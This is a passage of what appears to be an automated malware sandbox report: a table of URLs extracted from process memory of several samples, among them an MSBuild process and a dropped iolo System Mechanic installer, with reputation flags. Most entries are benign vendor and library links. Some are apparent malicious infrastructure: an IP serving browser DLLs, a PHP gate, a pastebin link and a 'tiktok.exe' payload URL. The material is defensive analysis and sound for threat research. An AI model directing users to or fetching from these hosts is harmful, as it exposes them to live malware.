0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://monitor.azure.com//.default	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp	false		high
http://www.vmware.com/0	run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://snapshot.monitor.azure.com/&	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp	false		high
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.	u5c4.3.exe, 00000005.00000003.2272268164.00000000025B6000.00000004.00001000.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000003.2272268164.0000000002654000.00000004.00001000.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000003.2272268164.0000000002619000.00000004.00001000.00020000.00000000.sdmp	false		high
https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	false		high
https://www.iolo.com/company/legal/sales-policy/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080452000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.indyproject.org/	kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000003.2272268164.0000000002612000.00000004.00001000.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	false	URL Reputation: safe	unknown
https://support.iolo.com/support/solutions/articles/44001781185?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	false		high
https://www.iolo.com/company/legal/privacy/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	false		high
http://www.codeplex.com/CompositeWPF	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042123428.00000240F7C70000.00000004.08000000.00040000.00000000.sdmp	false		high
https://support.iolo.com/support/solutions/articles/44001781185	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080796000.00000004.00000800.00020000.00000000.sdmp	false		high
https://scripts.sil.org/OFL	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3069494325.00000240FBF32000.00000004.00000800.00020000.00000000.sdmp	false		high
https://taskscheduler.codeplex.com/H	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	false		high
https://www.iolo.com/company/legal/sales-policy/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	false		high
https://scripts.sil.org/OFLX8	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3069494325.00000240FBF32000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.76/15f649199f40275b/mozglue.dllL	u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pastebin.com/raw/z9pYkqPQPOdq8	MSBuild.exe, 00000012.00000002.2405611907.0000000002811000.00000004.00000800.00020000.00000000.sdmp	false		high
https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MSBuild.exe, 0000000E.00000002.2977711882.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	false		high
https://indiantypefoundry.com	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3069494325.00000240FBF32000.00000004.00000800.00020000.00000000.sdmp	false		high
https://download.avira.com/download/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042123428.00000240F7C70000.00000004.08000000.00040000.00000000.sdmp	false		high
http://dejavu.sourceforge.net	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	false		high
http://185.172.128.76/15f649199f40275b/freebl3.dllZ	u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mozilla.com/en-US/blocklist/	u5c4.0.exe, u5c4.0.exe, 00000001.00000002.2520130811.000000006CCAD000.00000002.00000001.01000000.00000015.sdmp	false		high
https://www.iolo.com/company/legal/privacy/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.76/3cd2b41cbde8fc9c.phpeb42eb8dbe78cdaae1ee01f89185a	u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/?q=	MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://microsoft.co	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3067902971.00000240FBD6C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rt.services.visualstudio.com/l	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	u5c4.0.exe, 00000001.00000003.1842333897.00000000245BD000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	false		high
http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection	run.exe, run.exe, 00000002.00000002.1882327714.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000000.1797546896.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000000.2066260274.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000002.2136653870.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp	false		high
https://dc.services.visualstudio.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.symauth.com/cps0(	run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	u5c4.0.exe, 00000001.00000003.2225747415.000000002A7D4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dc.services.visualstudio.com/f	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://profiler.monitor.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.iolo.com/support/solutions/articles/44	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080796000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.symauth.com/rpa00	run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/jsonschema	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	false		high
http://www.info-zip.org/	run.exe, 00000002.00000002.1888066079.00000000044B0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.0000000005632000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.0000000003758000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.0000000005766000.00000004.00000800.00020000.00000000.sdmp	false		high
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-	u5c4.3.exe, 00000005.00000003.2272268164.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://westus2-2.in.applicationinsights.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.iolo.com/company/legal/eula/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	false		high
http://185.172.128.76	u5c4.0.exe, 00000001.00000002.2500065620.0000000004354000.00000040.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://dejavu.sourceforge.net/wiki/index.php/License	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://scripts.sil.org/OFLThis	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	u5c4.0.exe, 00000001.00000003.2225747415.000000002A7D4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/itfoundry/Poppins)&&&&z	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	false		high
https://github.com/itfoundry/Poppins)	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	false		high
https://snapshot.monitor.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/itfoundry/Poppins)&&&&v	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://scripts.sil.4	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3033911115.00000240F78A5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://www.iolo.com/company/legal/eula/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/json	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	false		high
https://westus2-2.in.applicationinsights.azure.com/v2/track	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabS	MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	u5c4.0.exe, 00000001.00000003.1842333897.00000000245BD000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	false		high
http://google.com	kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	false		high
https://dc.services.visualstudio.com/v2/track	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.203/tiktok.exe00	u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
http://www.codeplex.com/prism	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042123428.00000240F7C70000.00000004.08000000.00040000.00000000.sdmp	false		high
https://taskscheduler.codeplex.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	false		high
https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	false		high
http://compositewpf.codeplex.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042123428.00000240F7C70000.00000004.08000000.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 